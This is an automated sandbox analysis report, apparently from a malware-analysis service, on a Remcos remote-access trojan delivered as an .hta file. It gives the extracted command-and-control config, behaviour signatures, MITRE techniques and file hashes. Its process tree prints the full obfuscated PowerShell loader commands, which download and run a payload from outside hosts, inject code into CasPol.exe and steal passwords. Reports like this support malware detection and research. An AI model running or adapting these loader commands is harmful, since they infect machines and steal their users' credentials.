remcos | eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2025 03:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9.hta
Size

15KB
MD5

3ad24c21ca8cfdc1f7ea80d990a58cd1
SHA1

6e2d56eb9085869945b192c74874758ebdf033f9
SHA256

eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9
SHA512

71a8ba67fc2d15c7e420e1b8ca91a6445292b88e4db35517944e2671977e00418c97f963c1df8b9b34fc2a6912a6d2103f6587a9f7ce25fb4d48728c156f65c2
SSDEEP

48:3v6cylbcrSlb4zg9HLzIr5fcpy8veDYRjNx9bPyx6qLchrc7Qw4OllAc1G:frzg9rzYfEPG4jdPyoN

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

198.46.178.132:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-RWD64Z
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1480-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/616-104-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1644-111-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1480-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/616-104-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	3528	powershell.exe
20	1592	powershell.exe
21	1592	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
3528	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1592	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1592 set thread context of 1052	1592	powershell.exe	95
PID 1052 set thread context of 616	1052	CasPol.exe	96
PID 1052 set thread context of 1480	1052	CasPol.exe	99
PID 1052 set thread context of 1644	1052	CasPol.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3528	powershell.exe
3528	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
616	CasPol.exe
616	CasPol.exe
1644	CasPol.exe
1644	CasPol.exe
616	CasPol.exe
616	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
1052	CasPol.exe
1052	CasPol.exe
1052	CasPol.exe
1052	CasPol.exe
1052	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	1644	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1052	CasPol.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 4168	2736	mshta.exe	86
PID 2736 wrote to memory of 4168	2736	mshta.exe	86
PID 2736 wrote to memory of 4168	2736	mshta.exe	86
PID 4168 wrote to memory of 3528	4168	cmd.exe	88
PID 4168 wrote to memory of 3528	4168	cmd.exe	88
PID 4168 wrote to memory of 3528	4168	cmd.exe	88
PID 3528 wrote to memory of 2412	3528	powershell.exe	89
PID 3528 wrote to memory of 2412	3528	powershell.exe	89
PID 3528 wrote to memory of 2412	3528	powershell.exe	89
PID 2412 wrote to memory of 2540	2412	csc.exe	90
PID 2412 wrote to memory of 2540	2412	csc.exe	90
PID 2412 wrote to memory of 2540	2412	csc.exe	90
PID 3528 wrote to memory of 2524	3528	powershell.exe	91
PID 3528 wrote to memory of 2524	3528	powershell.exe	91
PID 3528 wrote to memory of 2524	3528	powershell.exe	91
PID 2524 wrote to memory of 1592	2524	WScript.exe	92
PID 2524 wrote to memory of 1592	2524	WScript.exe	92
PID 2524 wrote to memory of 1592	2524	WScript.exe	92
PID 1592 wrote to memory of 2428	1592	powershell.exe	94
PID 1592 wrote to memory of 2428	1592	powershell.exe	94
PID 1592 wrote to memory of 2428	1592	powershell.exe	94
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1592 wrote to memory of 1052	1592	powershell.exe	95
PID 1052 wrote to memory of 616	1052	CasPol.exe	96
PID 1052 wrote to memory of 616	1052	CasPol.exe	96
PID 1052 wrote to memory of 616	1052	CasPol.exe	96
PID 1052 wrote to memory of 616	1052	CasPol.exe	96
PID 1052 wrote to memory of 2384	1052	CasPol.exe	97
PID 1052 wrote to memory of 2384	1052	CasPol.exe	97
PID 1052 wrote to memory of 2384	1052	CasPol.exe	97
PID 1052 wrote to memory of 4572	1052	CasPol.exe	98
PID 1052 wrote to memory of 4572	1052	CasPol.exe	98
PID 1052 wrote to memory of 4572	1052	CasPol.exe	98
PID 1052 wrote to memory of 1480	1052	CasPol.exe	99
PID 1052 wrote to memory of 1480	1052	CasPol.exe	99
PID 1052 wrote to memory of 1480	1052	CasPol.exe	99
PID 1052 wrote to memory of 1480	1052	CasPol.exe	99
PID 1052 wrote to memory of 1644	1052	CasPol.exe	100
PID 1052 wrote to memory of 1644	1052	CasPol.exe	100
PID 1052 wrote to memory of 1644	1052	CasPol.exe	100
PID 1052 wrote to memory of 1644	1052	CasPol.exe	100

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x04aj32p\x04aj32p.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2412
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp" "c:\Users\Admin\AppData\Local\Temp\x04aj32p\CSCE1C4D7C38C5C48EDA0E710AEAEC5E3DD.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2540
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2524
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAawBjAGEAYgB0AGUAZwBvAHQAeQBhAHcAcgBlAHQAdABlAGIALwAwADIAMQAvADIANwAuADcALgA4ADYAMQAuADQAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1592
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:2428
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1052
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qamqkaal"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:616
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\svsjlskmeep"
        7⤵
        
        PID:2384
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\svsjlskmeep"
        7⤵
        
        PID:4572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\svsjlskmeep"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\dxfblkvgrmhhjg"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
f6aa5eabdbff233ec39bcdbcbfc27c30

SHA1
f5cf2a08077c3d9a98b8474c43ad1e59b24eb7cb

SHA256
f7dc570805d597368dc9e91accafdb47d503fcbd8bb02c16ac05785ccb26213f

SHA512
3fb2307b903781ac7633e7b7a18cf5a9f26a2e5c1b887a702a9d8f4987f791c07e6691daf8d292ab00de8032d940804c3d5e010a3b88046e4fb32a1a7e63edc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
b362537f4093fccb0b2ac4f7fa3d12e8

SHA1
390f3b9e5c7f85f3559ce28af3784722158c9e0e

SHA256
1fb2a2086d0a342c16f48cba03f83fb63168aa8bbf824c34847ed3653bff4113

SHA512
af8e81cb45c51f71bdc962490263287354357eaf51c09034524dd9b3a542124329f2b380329b2853cb750ca27b945e4457d97b92e10aaccd8abcabb2500ef578

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp

Filesize
1KB

MD5
3bd185762edd3ed423ca566cedde26bc

SHA1
fb7a273f2ccf7207ea2297831b75fc105aa606f6

SHA256
c209932b40348c1b49964aeaf8b56252be1981d2fd03d70d2ff57d152bf55b4f

SHA512
df92bec292aa008fd187fd9dd2f18162cfacf7ba34eef719795e1b6b52de388690c0e03e3a527f6fef2e06de06e0db111b8259d26cd2e755a30bd8e866fdff36

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hyvwzvfo.5am.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qamqkaal

Filesize
4KB

MD5
f59f92591b8d57a95f1a5beb23a658d7

SHA1
6d26907d3d1ad1799f6bda6ba2c7db51f0e8d56d

SHA256
2a662290f17ef4bd2b908aea8ebcabeef63117955b5be1769425bdefdbad1b22

SHA512
b619288957ad69898e325207462e20cfa7bbf9b116ec5237da6fe47fef5450b1e9e040f1c60941b00bad9e9cb31f775c843f4d180f575643d6894f51548aa13b

Download Submit
C:\Users\Admin\AppData\Local\Temp\x04aj32p\x04aj32p.dll

Filesize
3KB

MD5
b984b3521ed4352bca13f7201cbd3565

SHA1
dfc55dfab566ec89c02084cf110605137bd8746a

SHA256
f0148c13b077cbbfb31a32d5ea8c903c3eca907119e879c3bb4c336e71d73ede

SHA512
406035e9339e716a2a7b5db712d04d69b1192401427587f9f75ad4217221a4e2d448fc4deaaee2235f987a8090a559c30958b4d705dd5f7a6aa0072679dc7b27

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs

Filesize
229KB

MD5
88f23c1da68cf667cec4b361448b8367

SHA1
028988c872f4793172929f914e7c0dbb145397d8

SHA256
3b2b162a74ce403dff15fe96e5623cffdf3326e57949cdd1ecf5ffe9ad155bee

SHA512
97bfb73a8e0c81e8309dcbdf7b8bd4df826c1c18225c483a12929e1bec87332dcf3bd0f01d4ce9f981d63c685a40449b84a618ae5f9afe7b1ecbea05603fdbb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x04aj32p\CSCE1C4D7C38C5C48EDA0E710AEAEC5E3DD.TMP

Filesize
652B

MD5
85df39d6b6f1f32a55c28e2666582402

SHA1
99bb3e250ab5b8ed1cf18f585f5c1099550e5c86

SHA256
87536997940caa8d762dc2f5d624e69269aee8346a81809e3e361dccb992653b

SHA512
f968e358345e3cdb608e08ce96a110b67404d4e40c0f39e86f4087cd74ee5f1b098a4ea75c535100946a0a4727c212b0324411f4ade15c88aa6204bf2a4fbebf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x04aj32p\x04aj32p.0.cs

Filesize
477B

MD5
788c3576e3dc8f95e6eef8576140abc7

SHA1
23441802614b7925dfb9a627dddf94345081369f

SHA256
eb34dc7736008d75241298fb305f6a59e599ae41a8f58a4eeddd3cef9a9f00d3

SHA512
7321860df913545e1bd998f21a941bc82f9fbb84b95b072c0c61d5eb906032b0ec22c8a49bbed2573faff923f4f4f8de45222bf40f1d07fd1092c4ff6dcb1678

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x04aj32p\x04aj32p.cmdline

Filesize
369B

MD5
4746b79ca62b2c9362186ac7e00523ef

SHA1
fa1443218adc874e2fbfd8ee262bce6b36b63efe

